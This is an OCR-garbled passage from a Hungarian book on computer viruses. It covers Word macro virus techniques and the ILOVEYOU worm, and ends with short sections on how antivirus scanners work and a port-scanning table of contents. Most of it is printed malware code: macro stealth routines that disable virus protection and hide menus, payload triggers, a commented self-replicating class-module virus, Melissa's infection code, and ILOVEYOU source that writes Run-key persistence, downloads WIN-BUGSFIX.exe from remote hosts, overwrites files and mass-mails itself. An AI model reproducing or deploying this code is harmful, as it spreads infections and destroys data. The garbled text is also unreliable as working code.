CommandBars(''Tools"). If Month(Now( )) = l And Day(Now( ) = l Then Call Payload 'Ha az aktuális dátum január 2. ").5 Ilyet is lehet: a vírus egy Payload-ot hív meg Hogy a vírus ne legyen azonnal aktív.. ami megvalósítható néhány programsorral.dot mentésére. Ha a szám és a változó megegyeznek.dot-ot. Sub FileTemplates( ) On Error Ressume Next End Sub A felhasználó nem tudja elindítani a Sablonok és bővítmények ablakot. CommandBars(''Format"). azután nullánál megtörténik a gonoszkodás. Természetesen a rendszeres összehasonlítás egy véletlenszámmal is lehetséges. "). Fontos még: mivel ennek a funkciónak a kikapcsolása a háttérben történik. If x = 3 then Call Payload 'Ha x..5. hogy a makrovírust elrejtjük. amely alapértelmezésben rákérdez a Normal. VirusProtection = False Eltávolítja a vírusvédelmet. Ez úgy megy a legegyszerűbben."HKEY_CURRENT_USER\Software\ Microsoft\Office\9. A rejtőzködéshez bizonyos menüparancsok kikapcsolása is fontos.Controls(''Macro"). egy folyamatellenőrzési lehetőséggel is fel van ruházva. 5. Sub ToolsMacro( ) On Error Resume Next End Sub Ha a felhasználó az Eszközök/Makró/Makrók-ra. Options. a hiányát csak az veszi észre. A felhasználó nem láthatja a párbeszédmezőt. A Word kérdését. System. A fertőzésszámláló pontosan ezt a lehetőséget kínálja. Ehhez el kell helyezni egy kulcsot valahol a Registry-ben. Sub WordBasic. amely egy 0-100 közti számot tartalmaz. aki jól kiismeri magát a Wordben. így anélkül lehet megváltoztatni a Normal. akkor menj a payloadra. lefut ez a sub.Delete Kiveszi a sablonokra és a bővítményekre vonatkozó menüparancsokat. menj a Payloadra.. Controls("Templates and Add-lns.Controls(''Style. Ugyanígy egy bizonyos napot is lehet használni.. ha nem lehet a menükből elindítani a megfelelő funkciókat. hogy a makrókat lefuttassa-e. SubViewVBCode( ) On Error Resume Next End Sub A felhasználó nem tudja elindítani a VB editort.Delete Kiveszi a makrókra vonatkozó menüparancsokat. A vírus eltávolítja ezeket a bejegyzéseket.0\\Word\SecTírity".PrivateProfileString("". . akkor menj a Payloadra. kattint. akkor következik be az esemény: x=Int(Rnd * 100) 'X egy változó.SaveNormalPrompt = False Ezzel a paranccsal kikapcsolja a párbeszédablakot. CommandBars("Tools"). amelyekkel a Word a dokumentumokban előforduló makrókra reagál.DisableAutoMacros = 0 End Sub Az automakrók inaktívvá válnak. hogy azt a felhasználó észrevenné. és sokkal tovább marad észrevétlen. Options. „Levél") = /& A Programhiba esetén az On Error Resume Next -tel egyszerűen továbbfut.Delete * Kiveszi a stílusokra vonatkozó menüparancsokat. If Month(Now( )) = l And Day(Now( ) = l Then Call Payload 'Ha az aktuális dátum január L.tehát azt jelentené. a következő paranccsal lehet kikapcsolni a Registry-ből. Ezen a helyen a ritkán használt parancsok elrejtése a Word 2000-ben különösen végzetesen hat: a felhasználó e beállítás miatt egyáltalán nem vesz észre bizonyos beavatkozási lehetőségeket. A megfelelő kódsorok egyszerű If lekérdezések..

és használjuk minden alkalommal.Title="Cím" . "). mint az eddig bemutatott makróvírusoké: itt már nem exportálnak és importálnak egy kódot minden jövendőbeli Word fájlba. egyes vírusprogramozók sportot űznek abból.Save End Sub 5.Delete CommandBars(''edit").HomeKey Unit:=wdStory Selection. amelyeknek magunk írhatjuk a forráskódját. Aki szeretne utánanézni. End Sub Ezentúl biztosan másképpen fogják kezelni a Word-figyelmeztetést.Replacement. hogy kvázi „láthatatlanok".5. A víruskód . 5. Az osztálymodulok a felhasználó számára nem olyan könnyen felismerhetők.Wrap = wdFindContinue .Subject = "Tárgy" . Sajnos. amelyeket az időzített kioldó vált ki.Controls("Repeat" Replace.Controls("Replace.Format = False .Controls("UndoVBA-Find.Comments = "Megjegyzések" . vállalva a felfedezés veszélyét. ami sokkal nehezebbé teszi a vírus felfedezését.Password = "hallo" 'Persze lehet véletlenszerű jelszót is csinálni. úgy találja meg ezt a párbeszédablakot.ReadOnlyRecommended = False With Dialogs(wdDialogFileSummaryInfo) .Keywords = "Keresőszó" .Text = "Mire cseréli" 'amire cseréli . Az osztálymodulok megfertőzésének a stratégiája más.Saved = False Then ActiveDocument. A kedvelt Keresés-Csere funkció most a vírust segíti: Sub Payload( ) On Error Resume Next Selection. mint a vezérlőelemek.5. Az osztálymodulok abban különböznek a felhasználó által meghatározott vezérlőelemektől.MatchAllWirdForms = False End With Selection.ClearFormatting With Selectíon.MatchWholeWord = True .Forward = True ... mert a makrókhoz és sablontartalmakhoz tartozó Makró és a Szervező ablakban nem mutatja őket a program.").5. hogy mindig új fertőzési módokat találjanak ki..Delete If ActiveDociment.7 A vírus jelszóval védi a fájlt A jelszavas védelmet is be lehet kapcsolni egy makrovírussal: Sub Payload( ) ActiveDocument. Százszázalékos védelem nem létezik. Az osztálymodulok bizonyos mértékig saját meghatározású vezérlőelemek.Execute").Delete CommandBars("edit").6 Megfertőzött osztálymodulok A WinWord dokumentumok megfertőzésének egy másik módja az osztálymodulok megfertőzése. Az osztálymodulok ezért ugyanazokkal a tulajdonságokkal rendelkeznek.Replacement. ha kapunk egy Word vagy Excel dokumentumot.Find .Text = "Mit keres" 'a cserélendő szöveg .. hanem beolvassák a kódot.MatchCase = False . vagyis egy objektumot definiálunk tulajdonságokkal és eljárásokkal.Author = "Szerző" . és ezt a sztringet illesztik be egy másik osztálymodulba.Find:ExecuteReplace:=wdReplaceAll CommandBars("edit"). Például megváltozhatnának a dokumentum-tulajdonságok: hirtelen egy Dagobert kacsa írta a levelet vagy ilyesmi: Sub Payload( ) ActiveDocument.6 A vírus fájltulajdonságokat vagy szövegtartalmakat változtat meg A Payload mögött különféle ténykedések rejtőzhetnek. ha az Eszközök/Makró/Makrók Szervezőre kattint. A vírusvizsgálónk legyen mindig a legfrissebb.Find. de hatékony megelőzés azért lehetséges.Execute End With End Sub Ugyanígy szavakat is kicserélhetünk Word parancsok segítségével.

. ' Figyelembe kell venni. VBComponents(l). A programozás stuktúrájához egyszerűen azt kell elképzelni. és csak a dokumentumban vagy a Normal. hogy a SUB Priváté. hogy az aktuális dokumentumot kell ' megfertőzni. annak fertőzésnél azonnal hibát jelez.DeleteLines l. VBProject. Source.CountOflines ' A megfertőzendő fájlban minden sort törölni kell. Így ez csak elpazarolt processzoridő. hogy világossá tegye a mögötte rejlő meggondolásokat.CountOflines) End With ' Ha egy objektumot egy With.Name ' Mivel nem tudjuk. ' amelyet meg kell fertőzni. VirCode ' A beolvasott sztring beillesztése a modulba.' annyi sort kell törölni.CodeModule Set Target = NormalTemplate.. De lehetséges. akkor nincs szükség ' az objektumnév ismétlésére.VBProject. ezt az új felülírja.' Ezzel biztosak lehetünk abban. amilyen hosszú a modul.CodeModule 'Ha a Normal... ' A Sub neve is megváltozott. és hogy a víruskód a Normal. nem pedig ' AutoOpen( ). az hibaüzenethez vezetne. amelyek előzőleg ott voltak. ' Tehát ott van. A kód beolvasásához tehát ki kell találni.Lines(l.dot-ban lehet. hogy Source. Most Document_Open( ) a neve.dot-ban vagyunk. anélkül. Else ' ha nem a Normal. hol vagyunk (a Normal. VBProject. .. End With Egy igazi vírus persze sokkal nagyobb ennél.. sortól kezdve. . On Error Resume Next ' a szokásos történet a hibával MyPos = ThisDoaiment. ' hogy ha ott egy másik vírus volt. VBComponents(1). hogy már az aktuális dokumentum is ' fertőzött. hogy előzőleg törölnénk ' a sorokat.CountOflines) ' Most a teljes víruskód a VirCode-ba lesz beolvasva. sortól kezdve. íme egy példavírus. hogy mit kell megfertőzni. VBProject. ' . törölve ' lesznek. Az 1.' megtalálható lenne. Ha a vírus ott már . Ez azonban azt is jelenti. sortól beolvasni.dot-ból jön.dot-ban vagy a dokumentumban) 'a ThisDocument.megnyitáskor láthatatlanul integrálódik minden további dokumentumba.. ' Source. amilyen hosszú a modul).InsetLines l. . kommentárokkal a kódban.VBComponents(1). Ezt ebben a példában nem ellenőrizzük.Lines(l.CodeModule Set Target = ActiveDocument. tudjuk.. Ha ezt valaki elfelejti. ' Létrehozzuk a változóinkat.dot-ban vagyunk.CodeModule End If With Source VirCode = .VBComponents( l). Private Sub Document_Open( ) ' Ez a Sub mindig lefut. . és még Stealth-funkciókat is tartalmaz.VBComponents(l). ' mert minden kód megfertőzésénél azok.CountOflines adja vissza a sorok/Lines számát a modulban. hogy a vírus végrehajtódik. With Target .VBProject. CodeModule ' Az indexszám l a VBComponents(l)-nél mindig a „ThisDocument" osztálymodul. . hogy ott már semmi sincs. ' Az l. annyi sort. és VirCode a sztring.Name adja a választ If MyPos = „Normal..Lines(az l. és beírjuk a modulba. ' ActiveDocument. . abból azután már logikusan következik.End With-blokkba zárunk... ha egy dokumentumot megnyitnak. Egy osztálymodulban mindennek ' Private-nak kell lennie. hogy hol vagyunk.dot" Then Set Source = NormalTemplate. már csak egy lehetőség marad hátra Set Source = ActiveDocument.

NTCL SetToInfect = NTIl NTILName = "Melissa" DoNT = True End If If DoNT <> True And DoAD <> True Then GoTo CYA If DoNT = True Then Do WhileADIl. 1) = "" NTIl.CodeModule.CodeModule. mellékletként.Lines(BGN. VBProject.DeleteLines l. NTCL = Hni.CountOfLines BGN =2 If ADILName <> "Melissa" Then IfADCL>OThen_ ADIl.Item(l) -re.CodeModule.Az alábbiakban egy példával világítjuk meg.DeleteLines l Loop ToInfect.VBProject.CodeModule. A LoveLettert először 2000.Lines Loop ToInfect.Item(l) 'Állítsd SetNTIl-et NormalTemplate.CodeModide-.VBComponents.Lines(BGN. 1) ="" ADIl.InsertLines BGN.Saved = True End If End Sub CUT HERE 5. ActiveDocumentName.CodeModule.7 ILOVEYOU A LoveLetter egy VBS-féreg (Vimal Basic Script) amely e-mailen keresztül terjed.AddFromString ("Private Sub Document_Open( )") Do While NTIl.InsertLines EGN. .Item(l) 'Állítsd ADIl-et ActiveDocument. 1) <> "" ToInfect. 1) BGN = BGN +l Loop If NTCL <> 0 And ADCL = 0 And (InStr(l.CodeModule.NTIl.CodeModule.Lines(1. „Document") <> False) Then ActiveDocument.VBProject.SaveAsFileName:=ActiveDocument. Néhány órán belül világszerte elterjedt.CodeModule. "Document") = False) Then ActiveDocument. ADCL SetToInfect = ADIl ADILName = "Melissa" DoAD = True End If If NTILName <> "Melissa" Then If NTCL >0 Then _ NTIl. Set NTI1 NormalTemplate. 1) <> "" ToInfectCodeModule. május 4-én jelezték.VBProject. VBComponents.Lines(BGN.CodeModule.AddFromString ("Private Sub Document_Close( )") End If CYA: Do While ADIl.Item(l)-re.DeleteLines l.CodeModule. ADIl.CodeModule.Lines(1. ActiveDocumentName.FullName Elself (InStr(l. és a hálóra csatlakoztatott cégek 90% -át megfertőzte.Lines(BGN.CountOfLims ADCL = ADIl. Most minden idők egyik legveszélyesebb vírusát fogjuk alaposabban szemügyre venni.CodeModule.VBComponents.CodeMOdule. 1) BGN = BGN + l Loop End If If DoAD = True Then Do While NTIl.CodeModule. hogyan fertőzi meg az osztálymodulatokat a Melissa: CUT HERE Priváté Sub Document_Open( ) On Error Resume Next Set ASI1 = ActiveDocument.VBComponents.

sct. • LOOK! • How to protect yourself from the ILOVEYOU bug! Az Amable Mendoza Aguila Computer College-ben. Időközben a hackereknek volt idejük. A féreg.mp3 és az . 5. mint az ILOVEYOU esetében..wsh. amely jelszavakat kémlel ki. megkapta a . . Úgy módosította a mIRC script..7. . vagy a gépet is rögtön kilőni! A féregnek egy variánsa aktiválta a jelszó cache-elést. legfeljebb magas forgalmat (traffic) generál. ezzel az üzenettel: Bárok. .e.vbs.2 A működési mód Az ILOVEYOU féreg egy weboldalról töltött le egyes bannereket. amelyek között ott volt a fertőzött is.7. Ugyanott a féreg a WIN-BUGSFIX programot is le akarta tölteni..ini fájlját. és ezeket Access Net accountokra kellett volna küldenie. amelyeket azonban hamarosan nem lehetett elérni. a Sky Internet Inc.jpeg. automatikusan elküldte magát a címjegyzék e-mailcímeire. . hivatalos számok szerint. a Taskmanager-en is megjelent mint w_srcipt. . mivel a Fülöp-szigetek-i szolgáltató.passwords.hta.trajan-by spyder. Ebben az esetben gyorsan be kellett zárni ezt a feladatot. és ezután a cache-elt jelszavakat elküldte mailben. Yeah another time to DEATH. Miközben a féreg aktív volt. . hogy minden döntő bizonyítékot töröljenek a gépeikről.mail.1 szoftver fejlesztésében. hogy részt vettek a Bárok 2. a Spyder nevet használó hacker munkahelyén 10 személyt gyanúsítottak azzal. Sok cég megelőzésképpen leválasztotta mailszerverét a netről.mp2 fájlokat. mivel ezekbe a statisztikákba nem kerülnek be a magánfelhasználók gépei. . • Joke • Mothers Day Order Confirmation • Dangerous Virus Warning • Vírus ALERT!!! • Important! Read carefully!! • I Cant Believe This!!! • Thank You For Flying With Arab Airlines • Variant Test • Yeah. A károkat több milliárd dollárra becsülték. Az eddig ismert változatok: • ILOVEYOU • Susitikim shi vakara kavos puodukui.5. aminek következtében néhány céges hálózatnak teljes egészében le kellett mondania a mailküldésről. a rendszergazdák félelmeit és feldühítését még egyáltalán nem számoltuk.. és törölte a webhelyet.jse. illetve elrejtette az .1 Mi az a féreg? A féreg egy darabkányi kód.send. hogy minden js. A féreg. míg a hatóságok napokon át semmit sem tettek. Így nagy forgalom keletkezett a cégek belső hálózati mailszerverein.jpg fájlt használhatatlanná tett. A féreg manipulálta még a következő Registry-bejegyzéseket: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run \MSKernel32 HKEY_LOCAL_MACHINE\Sofrware\Microsoft\Windows\CurrentVersion\Run Services\Win32DLL HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run \WN-BUGSFIX Miután lefuttatták. A vírussal ellentétben a féreg nem közvetlenül rombol. s ez az érintett szerverek tisztán materiális kiesési ideje. hogy egy csatorna minden látogatója. A féreg az Outlookon és a mIRC-en keresztül is terjedt. . . amely magától terjed az interneten vagy a helyi hálózaton keresztül. A legdestruktívabb azonban az a tény volt. 600 ezer számítógépet ért el..er. a nem hivatalos számok azonban ennél jóval magasabbak. gyorsan kapcsolt.vbs fájlt. Két prominens áldozat is volt: a ZDF tévéadó és az Expo-világkiállítás..css..

GetFile(Wscript. ezekkel a változókkal fog a későbbiekben dolgozni. Az On Error Resume Next-tel a hibakezelést vezeti be: ha a program futtatása közben hiba lép fel. main( ) sub main( ) On Error Resume Next dim Tvscr.vbs") c.ScriptFullName) c. és a Registry-bejegyzések eltávolítása.com / ©GRAMMERSoft Group / Manila.eq. Ezután definiál néhány változót. ha minden végfelhasználó tudott volna a Visual Basic Script veszélyeiről. még nem ismert általánosan. Copy(dirsystem& "\MSKernel32. A vírus a Windows Scripting Host-tal hajtódik végre.vbscopy. főleg az internetes újoncokban.7. Ellenintézkedésként ajánlkozik a WindowsScripting hostok eltávolítása uninstall-lal.3 Hogyan tudott a féreg elterjedni? A féreg terjedésének az alapja az volt. nemhogy egy analízis háttérinformációkkal a felhasználók számára.file. de hangsúlyozzuk.dow eq="" ctr=0 .Az eset egyedüli nyertesei az antivírusok gyártói voltak. tehát a szerző mailcíme és álneve. Ennek a féregnek semmi esélye sem lett volna.dirwin.rr setivscr=CreateObject("Wscript. Sokan azt hitték.Philippines Ezek a sorok csak szerzői kommentárok.kommentárokkal A továbbiakban az ILOVEYOU vírus forráskódja látható. a vírus működésére nincs semmilyen hatásuk. Set so = CreateObject("Scripting.0.GetSpecialFolder(2) Set c =fso. hogy ActiveX-kontrollok és más scriptek is veszélyesek lehetnek.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.ctr. mint az . Open TextFile (Wscript. valamint a *.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout". nem tudatosulnak a hálóval kapcsolatos veszélyek. hibaüzenet nélkül. ScriptFullname. On Error Resume Next dimFSO. hogy ebben a formájában teljesen hatástalan.Regread(''HKEY_CURRENT_USER\Software\Microsoft\Windows ScriptingHost\Settings\Timeout") if (rr>=l) then wscr.COM fájlok jelenthetnek veszélyt.7. hogy csak a végrehajtható fájlok.GetSpecialFolder(0) Set dirsystem =fso.TXT. Az ILOVEYOU vírus téma a múltban nagyon gyakran szerepelt a médiában. rem barok -loveletter(vbe) <i hate go to school> rem by: spyder / ispyder@mail.vbs") c. akkor a következő lépéssel kell folytatni. akiknek a részvényei 10%-kal is emelkedtek. hogy manapság.Shell") rr=scr.ReadAH A program ezután egy FileSystemObject-et (fso) hoz létre. 1) vbscopy=file. "REG_DWORD" end if Set dirwin = fso. 5. Az.vbs") regruns( ) html( ) spreadtoemail( ) listadriv( ) end sub 5.vbs fájlok törlése a Windows és a Windows/System könyvtárból.FileSystemObject") set file = f s o .dirtemp.GetSpecialFolder(l) Set dirtemp = fso. Ezzel az objektummal lehet fájlokat elérni.dirsystem.EXE vagy a . A következő sorban ez meg is történik: a program az OpenTextFile-lal és az azután következő ReadAll( ) -lal beolvassa magát a memóriába.4 A forrás . de sehol nem jelent meg róla még felvilágosítás. A célja csak a felépítés bemutatása és kommentálása sorról sorra.Copy(dirwin& "\Win32DLL.

exe" elseif num = 3 then regcreate "HKCU\Sofrivare\Microsoft\InternetExplorer\Main\Sart Page". Page". sub regruns( ) On Error Resume Next Dim num. Először a CreateObject( ) -tel egy Shell objektumot hoz létre . a működési módjukkal együtt. "http://www. hozzákezd az igazi feladatához.Innentől kezdődik a vírus főrutinja.exe" elseif num = 4 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Sart Page ". és ezt indításkor végrehajtja. A többi funkciót a forrásszöveg folyamatában magyarázzuk el. illetve LOVE-LETTER-FOR-YOU.ez az objektum teszi lehetővé a Windows különböző funkcióinak az elérését.vbs.downread& "\WIN-BUGSFIX. Ki lehet például olvasni a Registry-t. html( ).exe")=l) then Randomize num = Int((4 * Rnd) +1 if num = 1 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Sart Page ". net/ ~yotmg l s/HJKjnwerhjkxcvytwertnMTFwerdsfmhPnjw6581345gvsdfl619njbvYT/ WIN-BUGSFIX.skyinet. és írni lehet bele.exe" regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main \Sart "about:blank" end if end sub A regruns( ) funkciónak különböző feladatai vannak a Registry-ben. Win32DLL.net/ ~angelcat/skladjflfdjghKJnmtryDGFikjUlyqwrWe546786324hjk4jnHH GbvbmKL/ JKjhkqj3w/ WIN-BUGSFIX. hogy azután a maga egyik másolatát tegye le a következő neveken: MSKernel32.TXT.skyinet.skyinet. valamint a Windows/System (dirsystem) könyvtárat.skyinet.dirsystem&"\MSKernel32. spreadtoemail( ) és listadriv( ).vbs" downread="" downread=regget("HKEY_CURRENT_USER\Software\Microsoft\ Internet Explorer\Download Directory") if (downread="") then downread="c:" en if if<fíleexist(dirsystem&"\WinFAT32. A html( ) egy helyi HTML-fájlt helyez el. amihez a következő függvényeket hívja meg: regruns( ).downread regcreate "HKEY__LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion \Run \MsKernel32 ". "http://www.exe end if end if if (fileexist(dovmread&"\WIN-BUGSFIX.vbs.net/ ~koichi/jf6TrjkcbGRpGqaql98vbFV5hfFEjbopBdQZnmpOhfgER61b3Vlrvg/ WN-BUGSFIX. mindkettő a vírus előzőleg létrehozott másolatára mutat.exe elseif num = 2 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Sart Page".vbs" regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion \RunServices\Win32DLL ". A Set parancsokkal kérdezi le a program a Windows könyvtárait (dirwin). Mikor a vírus így bemásolta magát. "http://www. MSKernel és Win32DLL név alatt.dirwin8í "\Win32DLL. "http://www. Ezek a fájlok tehát kizárólag a vírust tartalmazzák. A CurrentVersion/Run alatt két kulcsot hoz létre.exe")=0) then regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run \ WIN-BUGSFIX". .vbs. ami később meg is történik. amely valójában még egyszer tartalmazza a vírust. net/~chu/ sdgfhjksdfiklNBmnfgkKLHjkq'wtiiHJBhAFSDGjkhYUgq'werasdjh PhjasfdglkNBhbq'webmznxcbvnmadshfgq'w23146I234iiiylthjg/ WIN-BUGSFIX.

write vbscopy mp3. ehhez négy különböző oldal szolgál választékul. Erről az oldalról azután még egy további fájlt is automatikusan letölt a vírus.path) next end sub .OpenTextFile(f1. ez a fájl megintcsak bejegyzi magát a Registry-be.Drives For Each d in de If d. és újból kezdi a működését. Minden fájlt felsorol.A Run alatti bejegyzések a Windows indításakor automatikusan lefutnak. egyszerűen a C:-t használja.CreateTextFile(f1. amelyet meg fog fertőzni: sub infectfiles(folderspec) On Error Resume Next dim f.path. Ez azt jelenti. Röviddel az ILOVEYOU megjelenése után azonban a skyinet.close set cop=fso. hogy a következő Windows-indításnál végrehajtódik.GetBaseName (f1. 2.path) set cop=fso.dc.write vbscopy ap.vbs") fso.path&". 2.path) elseif(ext="mp3" ) or (ext="mp2") then setmp3=fso.write vbscopy ap. bname.GetFile(f0. mp3 set f=fso.SubFolders infectfiles(f1.vbs") fso.true) ap.copy(folderspec& ""&bname& ". sub listadriv On Error Resume Next Dim d. úgy.path) ext=Icase(ext) s=Icase(f( ).path) folderlist(f1. amely a meghajtókon található minden mappát megdolgozza.name) if (ext="vbs") or (ext="vbe") then set ap=fso.net egyik szerverére vezet.copy(f1. Ez a funkció a mappák egyes fájljait szerkeszti.DeleteFile(f1. f1.write vbscopy ap. GetExtensionName (f1 .close elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (Ext="sct") or (ext="hta") then set ap=fso.OpenTextFile(f0). GetFolder(folderspec) set fc =f. mircfname. és ezután meghívja a folderlist függvényt.path) cop.net lépett.DriveType=3 Then folderlist(d. GetFolder(folderspec) set sf=f. OpenTextFile(f1.Files for each f1 in fc ext=fso. Minden oldal a skyinet. sub folderlist(folderspec) On Error Resume Next Minden mappán végrehajtja az InfectFiles funkciót.close dim f.FetFile(f1. true) ap. ap. Ha a vírus nem talál cache-t. s. Ezután a vírus az Internet cache-t keresi. s hogy pontosan mit is tesz.path&".2. és eltávolította a szerverről a megfelelő oldalakat.path) elseif(ext="jpg") or (ext="jpegn) then set ap=fso. ext.close bname=fso. hogy a következő rendszerindításkor a vírus ismét elindul. fc. true) ap. tehát azt a könyvtárat.patb&"") end if Next listadriv = s end sub Ez a függvény minden meghajtót kilistáz.DriveType = 2 or d. f1.vbs") mp3.path) cop. amelyek közül véletlenszerűen választ ki egyet.s Set dc =fso. s támogatja a vírus működését.path.DeleteFile(f( ). amelybe a megfelelő fájlokat tölti az Internet Explorer. sf for each f1 in sf set f=fso. az majd később következik. Most a program megváltoztatja az Internet Explorer kezdőlapját.path.

KhaledMardam-Bey" script.ini") or (s="mirc.RegWrite regkey.HTM nevű fájlt küld a csatorna minden felhasználójának. Ha talál egy mIRC-et (Chat Scriptet).WriteLine "n0=on 1:JOIN:#:{„ script. ha lefut.WriteLine "[script] script.WriteLine "n3=}" script.regvalue end sub function regget(value) Set regedit = CreateObject("Wscript." script.malead. . 2." script.exe") or (s="mlink32.exe") or (s="mirc. hogy léteznek-e bizonyos fájlok vagy mappák.CreateTextFile(folderspec& "\script.set att=fso. és ellenőrzik. GetFolderExist(folderspec)) then msg = 0 else msg = l end if fileexist = msg end funrtion sub spreadtoemail( ) On Error Resume Next dimx.regedit.ini. sub regcreate(regkey. Ez a script. megadott kiterjesztésű (.ini.WriteLine ".Shell") regedit. WINDOWS will affect and will not run correctly.ctrlists. akkor felülírja a script.a.WriteLine ".b.ini. mIRC will corrupt.ini.http://www..ini.hlp") then set scriptini=fso.FileExist(filespec)) Then msg = 0 else msg = 1 end if fileexist = msg end function function folderexist(folderspec) On Error Resume Next dim msg if ( f s o .WriteLine " n 1 = / i f ( = = ) {halt}" script.HTM" script.js.WriteLine ".GetFik(f1.WriteLine ". 1. if mIRCwill" script.css stb.attributes+2 end if if (eq<>folderspec) then if (s="mirc32.ini-t.ini. thanks" script. és a saját magáról készített másolattal írja felül ezeket.mIRCScript" script.dcc send "&dirsystem&\LOVE_LETTER_FOR_YOU.ini.ini.regv. WriteLine " corrupt.attrihites=att.ini.Shell") regget=regedit. ugyancsak a vírust terjeszti úgy.ini") script.regualue) Set regedit = CreateObject("Wscript.RegRead(value) end function function fileexist(filespec) On Error Resume Next dim msg if (fso. Ezek a függvények egy Registry-bejegyzést készítenek. Please dont edit this script. . hogy egy LOVE_LETTER_FOR_ YOU. WriteLine "..ini. amelyeket a program más pontjain használ fel.wsh.) fájlt..ctrentries.regad . mirc..ini.ini.path) att. Megkeres minden.close eq=folderspec end if end if next end sub Az InfectFiles -nak két feladata van.WriteLine ".WriteLine "n2= /.ini") or (s="script. com " script. A következő függvények segédfüggvények.ini.

Csak ezért tudott ennyire gyorsan elterjedni.8. amelyben a Windows minden mailcímet tárol.AddressEntries(x) regad="" regad=regedit. A legtöbb vírusvizsgáló frissítésekkel folyamatosan bővíti az adatbázisát.RegRead("HKEY_CURRENT_USER\Software\ Microsoft\WAB"&malead) if(regad="") then set male=out.AddressEntries. ehhez a szoftver gyártói saját víruslaborokat tartanak fenn.AddressEntries. 5. az egyszerűsége ellenére. Count endif next x=l Set out=Nothing Set mapi=Nothing end sub A SpreadToEmail( ) függvény megnyitja a programot.Body =vbcrlf&"kindly check the attached LOVELETTER comingfrom me. és látogatják az idevágó newsgroupokat. Az internet-.Send regedit. hogy folyamatosan tudjanak reagálni az új fenyegetésekre.Subject = "ILOVEYOU" male. Amint látjuk. 1. Az ilyen szkennelésnél a hibaszázalék magasabb. amit talál.EXE). Ha a szkenner megváltoztatott kódot vagy valamilyen egyéb eltérést észlel.Add(dirsystem& "\LOVE-LETTER-FOR-YOU. csak különböző script-fáljokat írt át.Attachments. amely minden felismerhető vírus nevét és lenyomatát tartalmazza. tehát a címjegyzéket (WAB. vbs") male. .Application ") set mapi=out. "REG_DWORD" endif x=x+l next regedit.setregedit=CreateObject("Wscript. hogy megállapítsa a víruskódokkal való egyezést.RegWrite "HKEY_CURRENT_USER \Software \Microsoft\WAB"&malead. illetve mailszolgáltatók kára viszont . igazán komplex funkciókkal van felszerelve.AddressLists. az ILOVEYOU. többnyire csekély. GetNameSpace("MAPI") for ctrlists=1 ro mapi. és ezzel potenciálisan olyan vírusokat is leleplezhet. A szkennermodul a vírusok sztringjeit és viselkedési módját is felismeri.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB"&:a." male.Recipients.8 Hogyan működnek a vírusvizsgálók? A vírusvizsgáló egy adatbázist használ.Count malead=a.a feldolgozhatatlan mennyiségű e-mail miatt milliós volt. hogy azután a címjegyzékben talált minden címre elküldje a vírus másolatát.Add(malead) male. Count>inr(regv)) then for ctrentries=l to a. Ez a program tulajdonképpeni terjedési módja: lefut. A szkenner ellenőrzi egy fájl vagy egy program kódját. és elküldi magát minden címre. mint a normál víruskeresésnél.AddressLisets(ctrlists) regv=regedit. úgynevezett nyomozócsapatokat foglalkoztatnak. amelyek még nincsenek benne az adatbázisban. A kár.1 Szkennermodul A szkennermodul a vírusok felkutatásáért felelős a merevlemezen.RegRead(''HKEY_CURRENT_USER\Software\Microsoft\ WAB"&a) if(regv="") then regv=l end if if (int(a.a. AddressEntries.Createltem(0) male. Az eljárás neve Pattern Matching.Count set a=mapi. TXT. amelyet a felhasználóknál hátrahagyott. akkor ezt összehasonlítja az adatbázis lenyomataival. CreateObject("Outlook.Sheir) set out=WScript. 5.

vagy törli a fájlt. a fertőzéstől függően. jelentést tesz. átnevezik vagy letöltik a hálóról.2 Víruspajzs A víruspajzs egy memóriarezidens. az attól függ. hogy a vírusprogramtól függő mértékben visszafogja a rendszerteljesítményt.8. hogy valós időben. hogy valamiképpen megtisztítsa. folyamatosan kövesse a felhasználók minden fájlelérését. vagy a szkennelés leállítja a rendszert? • Felismeri-e a program a vírusokat már letöltés közben? • Meg tudja-e találni a szoftver tömörített fájlokban is a vírusokat? • Tudja-e ellenőrizni az e-mailhez csatolt fájlokat (attachments) már az elindításuk előtt? A kezelése kényelmes.5. kijelölnek. és mennyibe kerülne az adatok újbóli előállítása. A következő szempontokra kell ügyelni: • A kínált programfrissítési gyakoriság (legjobb hetente egyszer) • Az ügyféltámogatás minősége • Szkennelési sebesség • Szkennelési minőség • Lehetséges-e a szkennelés a háttérben.4 A vírusvédő program kiválasztásának a szempontjai Hogy mennyit akarunk vagy kell ráfordítanunk egy-egy virusvizsgálóra. hogy milyen nagy a fertőzés kockázata. 5. Úgy van beállítva. vagy elkülöníti. azaz áthelyezi egy „karanténkönyvtárba". a háttérben működő szkenmodul. ha nincs rá lehetősége. 5. vagy feleslegesen bonyolult? . Ennek a modulnak.8. a víruspajzs azonnal megvizsgálja. A hátránya. és ha szükséges. Vagy megtisztítja a fájlt a vírustól.3 „Fertőtlenítő" Ha a szkenner vírust talál. Ha egy fájlt elindítanak.8. különböző opciói vannak a vírus eltávolítására. ez a modul lép akcióba.

8 A nyitott portok csak a kezdetet jelentik 6. fejezet .2.2.2 Félig nyitott TCP-szkennelés 6.Tartalom 6.2.6 UDP-Recvfrom-And-Write szkennelés 6.9 A portszkennelés elleni védelem .2.4 Fragmentált szkennelés 6.2.2.2. A szkenner Szkennelesi eljárások 6. 6.1 Szkenneles teljes TCP-kapcsolattal 6.2.1.5 UDP-ICMP-Port-Unreachable szkennelés 6.2.3 TCP-FIN-Scan 6.6.2.7 ICMP-echo-scanning/ping-szkennelés 6.

